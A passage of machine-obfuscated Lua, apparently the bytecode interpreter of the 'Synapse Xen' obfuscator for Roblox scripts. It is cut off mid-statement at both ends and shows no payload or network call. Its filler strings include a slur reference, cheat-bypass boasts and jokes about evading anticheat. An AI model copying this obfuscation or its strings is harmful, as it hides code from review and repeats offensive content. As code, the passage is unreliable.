SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(2815937657,2543132550)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1891806609,2403127800)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[555456121]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(2880008175,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(2425071493,SynapseXen_IllIiIili[7]))-string.len(SynapseXen_IiIil)-#{26726980,564328576,2342687718,2837112661,2174410786,240120290,3989245949,4290257308}return SynapseXen_ilIliiI[555456121]end)({},"lIllliIIIIl",2645,1624,"iiIIIII",2914,{},5855,"i"))local SynapseXen_llIlIliI=SynapseXen_lIiil;if SynapseXen_llIlillliIl==0 then SynapseXen_lIIIllIiiIIlil=SynapseXen_lIIIllIiiIIlil+1;SynapseXen_llIlillliIl=SynapseXen_lilllillilllIilIIlII[SynapseXen_lIIIllIiiIIlil][497366273]end;local SynapseXen_liIIIIliiliIlli=(SynapseXen_llIlillliIl-1)*50;local SynapseXen_lIliIIlIliiiiIlIIiI=SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill]if SynapseXen_IiIiilIIliIIlliI==0 then SynapseXen_IiIiilIIliIIlliI=SynapseXen_llllIilliIllilII-SynapseXen_liIilIlIllIill end;for SynapseXen_IiliiliIiiIiiIliIlI=1,SynapseXen_IiIiilIIliIIlliI do SynapseXen_lIliIIlIliiiiIlIIiI[SynapseXen_liIIIIliiliIlli+SynapseXen_IiliiliIiiIiiIliIlI]=SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill+SynapseXen_IiliiliIiiIiiIliIlI]end elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[1026413100]or(function()local SynapseXen_IiIil="yed"SynapseXen_ilIliiI[1026413100]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(3201734437,2831891271),SynapseXen_IiilillliiIi(1488104916,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{3008286309}return SynapseXen_ilIliiI[1026413100]end)())then if not not SynapseXen_lIiil[SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[923345909]or(function(...)local SynapseXen_IiIil="now comes with a free n word pass"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3598859230,4259167189)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1455391847,2839562505)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[923345909]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(3372070810,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(673173638,SynapseXen_IllIiIili[3]))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{3981098601,3992153047}return SynapseXen_ilIliiI[923345909]end)(4785,"IllIilillliIIIilll",1793,{},6718,"IliIIiiilliIl","lllilillIilIi"))]==(SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[221391887],SynapseXen_ilIliiI[4250621570]or(function(...)local SynapseXen_IiIil="hi my 2.5mb script doesn't work with xen please help"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3247539555,3337403881)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3645404903,649543147)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[4250621570]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(2177307283,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(1179552944,SynapseXen_IllIiIili[6]))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{848292151}return SynapseXen_ilIliiI[4250621570]end)("IIiIlliiliilIilili",3311,{},"iIlIiiIliiIIliiil","IIIIiIIliIII","IIlliiIiliilili"))==0)then SynapseXen_lIIIllIiiIIlil=SynapseXen_lIIIllIiiIIlil+1 end elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[808620375]or(function()local SynapseXen_IiIil="this is so sad, alexa play ripull.mp4"SynapseXen_ilIliiI[808620375]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(3063239576,3828791121),SynapseXen_IiilillliiIi(470708146,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{4035742472}return SynapseXen_ilIliiI[808620375]end)())then local SynapseXen_IiIiilIIliIIlliI=SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[4208720214]or(function()local SynapseXen_IiIil="now comes with a free n word pass"SynapseXen_ilIliiI[4208720214]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(4079861434,4266380639),SynapseXen_IiilillliiIi(1137509206,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{394703420,1341354965,1839321665}return SynapseXen_ilIliiI[4208720214]end)())local SynapseXen_llIlillliIl=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[221391887],SynapseXen_ilIliiI[3518684689]or(function(...)local SynapseXen_IiIil="hi xen crashes on my axon paste plz help"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(412402345,4086250547)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3025661196,1269291204)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[3518684689]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(2893208071,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(163735585,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{1082011814,1479261304,1363008302,3308347485}return SynapseXen_ilIliiI[3518684689]end)(12849,{},"il")),SynapseXen_iIIlIiiIiiiIIIi)local SynapseXen_llIlIliI=SynapseXen_lIiil;if SynapseXen_IiIiilIIliIIlliI>255 then SynapseXen_IiIiilIIliIIlliI=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_IiIiilIIliIIlliI-256]else SynapseXen_IiIiilIIliIIlliI=SynapseXen_llIlIliI[SynapseXen_IiIiilIIliIIlliI]end;if SynapseXen_llIlillliIl>255 then SynapseXen_llIlillliIl=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_llIlillliIl-256]else SynapseXen_llIlillliIl=SynapseXen_llIlIliI[SynapseXen_llIlillliIl]end;SynapseXen_llIlIliI[SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[1281449554]or(function(...)local SynapseXen_IiIil="double-header fair! this rationalization has a overenthusiastically anticheat! you will get nonpermissible for exploiting!"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(2888080667,2487504667)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(4027422243,267552777)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[1281449554]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(3363254744,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(3199919172,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{392754641,978595395}return SynapseXen_ilIliiI[1281449554]end)({},"llil",574),256)]=SynapseXen_IiIiilIIliIIlliI%SynapseXen_llIlillliIl elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[1263084176]or(function()local SynapseXen_IiIil="luraph better then xen bros :pensive:"SynapseXen_ilIliiI[1263084176]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(4012587902,3973125920),SynapseXen_IiilillliiIi(1297147803,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{896654394,2958285801}return SynapseXen_ilIliiI[1263084176]end)())then SynapseXen_llIll[SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[2116109763],SynapseXen_ilIliiI[3001754018]or(function(...)local SynapseXen_IiIil="this is a christian obfuscator, no cursing allowed in our scripts"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3027799586,2463801897)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(463152440,3831848750)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[3001754018]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(2812992511,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(2105636456,SynapseXen_IllIiIili[8]))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{2434519076,409387027,4073637875,1965720633,367973857,851385830,231790975,1261723355}return SynapseXen_ilIliiI[3001754018]end)(6478,{},{},{},{},10119),262144)]]=SynapseXen_lIiil[SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[1781557157]or(function(...)local SynapseXen_IiIil="epic gamer vision"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(1843790589,366030794)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(2094898256,2200033088)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[1781557157]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(4189702654,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(3927928800,SynapseXen_IllIiIili[2]))-string.len(SynapseXen_IiIil)-#{4218340160,770178898,742965055,1738579396,1097249765,1152957718,1850838369,1787730911}return SynapseXen_ilIliiI[1781557157]end)(11990,"iilliiIIlll",8178,"i","iiiiIliii"),256)]elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[1029053244]or(function()local SynapseXen_IiIil="wow xen is shit buy luraph ok"SynapseXen_ilIliiI[1029053244]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(1214384365,3990744572),SynapseXen_IiilillliiIi(3949756343,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{978059057,2371296117,2788707800,3947324985}return SynapseXen_ilIliiI[1029053244]end)())then local SynapseXen_liIilIlIllIill=SynapseXen_iiIii(SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[560709554]or(function(...)local SynapseXen_IiIil="https://twitter.com/Ripull_RBLX/status/1059334518581145603"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(2892654764,74038987)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3807386305,487590689)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[560709554]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(166979830,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(4016008845,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{841369674,1876612051,3232204083,3470367259,1451400866,3503796712,1568960560,4151849018}return SynapseXen_ilIliiI[560709554]end)("iiIlI",9371,691,{}),256),SynapseXen_iIIlIiiIiiiIIIi,256)local SynapseXen_llIlIliI=SynapseXen_lIiil;local SynapseXen_ililIillilIlIIl=SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill+2]local SynapseXen_iIIIillIiilIII=SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill]+SynapseXen_ililIillilIlIIl;SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill]=SynapseXen_iIIIillIiilIII;if SynapseXen_ililIillilIlIIl>0 then if SynapseXen_iIIIillIiilIII<=SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill+1]then SynapseXen_lIIIllIiiIIlil=SynapseXen_lIIIllIiiIIlil+SynapseXen_illIIilIiIIiIIill[990094981]SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill+3]=SynapseXen_iIIIillIiilIII end else if SynapseXen_iIIIillIiilIII>=SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill+1]then SynapseXen_lIIIllIiiIIlil=SynapseXen_lIIIllIiiIIlil+SynapseXen_illIIilIiIIiIIill[990094981]SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill+3]=SynapseXen_iIIIillIiilIII end end elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[2138682552]or(function()local SynapseXen_IiIil="level 1 crook = luraph, level 100 boss = xen"SynapseXen_ilIliiI[2138682552]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(3464425599,343256905),SynapseXen_IiilillliiIi(2493982468,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{3136280341,3450533347,787394915,1787458951,1351475724}return SynapseXen_ilIliiI[2138682552]end)())then SynapseXen_iIIlIiiIiiiIIIi=SynapseXen_lIiil[SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[2713552582]or(function()local SynapseXen_IiIil="aspect network better obfuscator"SynapseXen_ilIliiI[2713552582]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(37605271,3594474344),SynapseXen_IiilillliiIi(3408804370,SynapseXen_IllIiIili[4]))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{212271772,4281564244,2643598803,3654535745}return SynapseXen_ilIliiI[2713552582]end)())]elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[2924959654]or(function(...)local SynapseXen_IiIil="now with shitty xor string obfuscation"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(2003639156,622303559)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1680571385,2614380622)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[2924959654]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(1157921825,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(1507116207,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{766872925,1683654588,1414827462,2486445318,82994825,59632018,1578520714,3377637193,2099171958}return SynapseXen_ilIliiI[2924959654]end)("lIIIIIIlIiIIiiiIiI","Ill",{},{},8386,"ili"))then if SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[2116109763],SynapseXen_ilIliiI[1379606661]or(function(...)local SynapseXen_IiIil="sometimes it be like that"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(2490554886,1997900129)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(2092101808,2202850869)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[1379606661]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(336891056,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(931850146,SynapseXen_IllIiIili[6]))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{291839689,3069105609,3631238555,576199974,3643598414,583600238,1938694880,1910902293}return SynapseXen_ilIliiI[1379606661]end)({},"IIllilliliIlllIilll",{},{},{},1260,"IIiililIliiiIIiiI"))==(SynapseXen_ilIliiI[156434360]or(function(...)local SynapseXen_IiIil="baby i just fell for uwu,,,,,, i wanna be with uwu!11!!"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3880399858,3027393567)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(984208895,3310730237)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[156434360]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(180895544,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(392115772,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{2677713965,3933903096,1511390159,2440670580,1740817051,3697363084}return SynapseXen_ilIliiI[156434360]end)({},3431))then SynapseXen_lIiil[SynapseXen_iiIii(SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[798189332]or(function(...)local SynapseXen_IiIil="SYNAPSE XEN [FE BYPASS] [BETTER THEN LURAPH] [AMAZING] OMG OMG OMG !!!!!!"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(2508730027,2526831873)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1819543490,2475458989)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[798189332]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(3553314847,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(2658947750,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{3925314502,986257612,2398469987,2743061215,2488289256,3674404554,3924875339,2432944787,3429124189}return SynapseXen_ilIliiI[798189332]end)({},{},"IIIIlIiIiiIlI",{},"llIlilI","lIIIliliiillII","l","IiIlI"),256),SynapseXen_iIIlIiiIiiiIIIi,256)]=SynapseXen_IiIilliilIIl else SynapseXen_lIiil[SynapseXen_iiIii(SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[798189332]or(function(...)local SynapseXen_IiIil="SYNAPSE XEN [FE BYPASS] [BETTER THEN LURAPH] [AMAZING] OMG OMG OMG !!!!!!"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(2508730027,2526831873)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1819543490,2475458989)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[798189332]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(3553314847,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(2658947750,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{3925314502,986257612,2398469987,2743061215,2488289256,3674404554,3924875339,2432944787,3429124189}return SynapseXen_ilIliiI[798189332]end)({},{},"IIIIlIiIiiIlI",{},"llIlilI","lIIIliliiillII","l","IiIlI"),256),SynapseXen_iIIlIiiIiiiIIIi,256)]=SynapseXen_IllIiIili[SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[2116109763],SynapseXen_ilIliiI[1379606661]or(function(...)local SynapseXen_IiIil="sometimes it be like that"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(2490554886,1997900129)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(2092101808,2202850869)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[1379606661]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(336891056,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(931850146,SynapseXen_IllIiIili[6]))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{291839689,3069105609,3631238555,576199974,3643598414,583600238,1938694880,1910902293}return SynapseXen_ilIliiI[1379606661]end)({},"IIllilliliIlllIilll",{},{},{},1260,"IIiililIliiiIIiiI"))]end elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[1486760293]or(function()local SynapseXen_IiIil="pain exist is gonna connect the dots of xen"SynapseXen_ilIliiI[1486760293]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(1388459681,809882014),SynapseXen_IiilillliiIi(740587700,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{1847476725,3452634997}return SynapseXen_ilIliiI[1486760293]end)())then local SynapseXen_liIilIlIllIill=SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[2236641028]or(function()local SynapseXen_IiIil="HELP ME PEOPLE ARE CRASHING MY GAME PLZ HELP"SynapseXen_ilIliiI[2236641028]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(1504140756,134637720),SynapseXen_IiilillliiIi(1675310788,SynapseXen_IllIiIili[1]))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{436757378,734741550,4266216878,2634692168,3841292674,3690322239,32459227,3563206487,1170938818,4274100153}return SynapseXen_ilIliiI[2236641028]end)())local SynapseXen_IiIiilIIliIIlliI=SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[4043373179]or(function()local SynapseXen_IiIil="https://twitter.com/Ripull_RBLX/status/1059334518581145603"SynapseXen_ilIliiI[4043373179]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(3679614117,3198850719),SynapseXen_IiilillliiIi(241852662,SynapseXen_IllIiIili[2]))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{2122106213,4086855746,2181138406,196292655,617129979}return SynapseXen_ilIliiI[4043373179]end)(),512)local SynapseXen_llIlIliI=SynapseXen_lIiil;local SynapseXen_iiiillil,SynapseXen_iiIlIIi;local SynapseXen_iIIIIlliilIIiIl;if SynapseXen_IiIiilIIliIIlliI==1 then return elseif SynapseXen_IiIiilIIliIIlliI==0 then SynapseXen_iIIIIlliilIIiIl=SynapseXen_llllIilliIllilII else SynapseXen_iIIIIlliilIIiIl=SynapseXen_liIilIlIllIill+SynapseXen_IiIiilIIliIIlliI-2 end;SynapseXen_iiIlIIi={}SynapseXen_iiiillil=0;for 